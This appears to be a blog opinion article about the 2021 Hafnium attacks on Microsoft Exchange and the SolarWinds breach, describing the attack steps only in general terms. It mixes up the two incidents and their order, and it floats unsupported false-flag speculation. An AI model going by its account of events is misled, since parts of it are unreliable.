A sophisticated attack on Microsoft’s ubiquitous email software is being laid at the Chinese’s feet. Many people ask whether the attack was a Chinese hack, a false flag, or something else. However, whatever it was, it is clear that the attack is now verging on the edge of a global crisis.
If you think a cyberattack is minor and wouldn’t affect you, check out this article on the Petya ransomware attack or this one on a Florida water supply. It’s actually shocking just how easily a massive cyberattack could happen to us, so you may want take some steps to be prepared for the possibility of a cyberattack.
Now let’s talk about how bad this Solar Winds attack almost was. It may make you wonder whether cyber warfare is the battleground of the future.
Microsoft says the attack has claimed at least 60,000 victims-many of them small businesses
This attack, which focused on email software, has become a global cybersecurity emergency, as hackers are racing to infect as many people as possible before companies can secure their computer systems.
Microsoft claims the attack started with a Chinese government-backed hacking group. The European Banking Authority was also attacked. The bank announced Sunday that access to personal data through emails held on the Microsoft server might well have been compromised. Other victims include banks, electricity providers, senior citizen homes, and the businesses mentioned above. Others report that hospitals have also been experiencing attacks.
So it’s important to note that a cyberattack doesn’t just mess up a few computers – it can throw our entire modern way of life into utter chaos.
What is not being made clear is just what information the hackers have taken
These attacks come after the SolarWinds Corp. breaches that were blamed on Russian hackers. In the final days of the SolarWinds attack, it appears that whoever was behind the hack was able to automate the process and thus pick up tens of thousands of new victims around the world in just a matter of days.
Washington is claiming to be preparing its retaliation. According to MSM “sources,” the US government is planning a series of covert actions against Russian networks as well as more economic sanctions against Russia, which is precisely what has so many people wondering if the attacks were actually false flag operations.
Microsoft claims that it knows the identity of the Chinese hacking group: Hafnium
March 2, Microsoft put out a statement on its website. In the statement Microsoft claims that Hafnium appears to have been breaking into private and government networks through the Exchange software and has been doing so for several months.
Thus, after the first allegedly Russian hacking, there is now a second cybersecurity crisis that breached nine federal agencies and at least 100 companies through “tampered updates” from SolarWinds LLC, an IT management software maker.
Today, we’re sharing information about a state-sponsored threat actor identified by the Microsoft Threat Intelligence Center (MSTIC) that we are calling Hafnium. Hafnium operates from China, and this is the first time we’re discussing its activity. It is a highly skilled and sophisticated actor.
Historically, Hafnium primarily targets entities in the United States for the purpose of exfiltrating information from a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs. While Hafnium is based in China, it conducts its operations primarily from leased virtual private servers (VPS) in the United States.
Recently, Hafnium has engaged in a number of attacks using previously unknown exploits targeting on-premises Exchange Server software. To date, Hafnium is the primary actor we’ve seen use these exploits, which are discussed in detail by MSTIC here. The attacks included three steps. First, it would gain access to an Exchange Server either with stolen passwords or by using the previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it would create what’s called a web shell to control the compromised server remotely. Third, it would use that remote access – run from the U.S.-based private servers – to steal data from an organization’s network.
Cybersecurity experts are now expressing a growing sense of exhaustion and frustration
China has denied having anything to do with the attack. Chinese foreign ministry spokesman says the country “firmly opposes and combats cyber attacks and cyber theft in all forms” and pointed out that blaming a specific nation was a “highly sensitive political issue.”
Both of these incidents show just how fragile modern networks are. It also shows how sophisticated state-sponsored hackers are whenever they attempt to identify “hard-to-find vulnerabilities” or even create them themselves to conduct espionage operations. They both involve complex cyberattacks with an initial attack on many computers, which then narrowed as the attack was able to be more focused. Both took the organizations attacked weeks or months to resolve.
Applying the updates provided by Microsoft will not remove the attackers from the network
A review of affected systems is required, Carmakal said. And the White House emphasized the same thing, including tweets from the National Security Council urging the growing list of victims to carefully comb through their computers for signs of the attackers. Initially, the Chinese hackers appeared to be targeting high value intelligence targets in the U.S., Adair said. About a week ago, everything changed. Other unidentified hacking groups began hitting thousands of victims over a short period, inserting hidden software that could give them access later, he said.
“They went to town and started doing mass exploitation — indiscriminate attacks compromising exchange servers, literally around the world, with no regard to purpose or size or industry,” Adair said. “They were hitting any and every server that they could.”
Adair said that other hacking groups may have found the same flaws and began their own attacks — or that China may have wanted to capture as many victims as possible, then sort out which had intelligence value.
Either way, the attacks were so successful — and so rapid — that the hackers appear to have found a way to automate the process. “If you are running an Exchange server, you most likely are a victim,” he said.
Is the future of warfare cyber warfare?
The United States government has every reason to stage a false flag cyberattack to justify more sanctions against Russia and future action against China. But we also have to be realistic. Both Russia and China have every reason to gather as much information on American governmental and economic assets as possible.
So we stand between two possibilities knowing that both can and will be exploited by world powers for their own agendas.
Are you concerned about the possibility of a cyberattack?
Are you doing anything to prepare for a possible cyberattack? What are some considerations you’ve thought of besides just your personal or business systems? Let’s talk about it in the comments.
Robert Wheeler has been quietly researching world events for two decades. After witnessing the global network of NGOs and several ‘Revolutions’ they engineered in a number of different countries, Wheeler began analyzing current events through these lenses.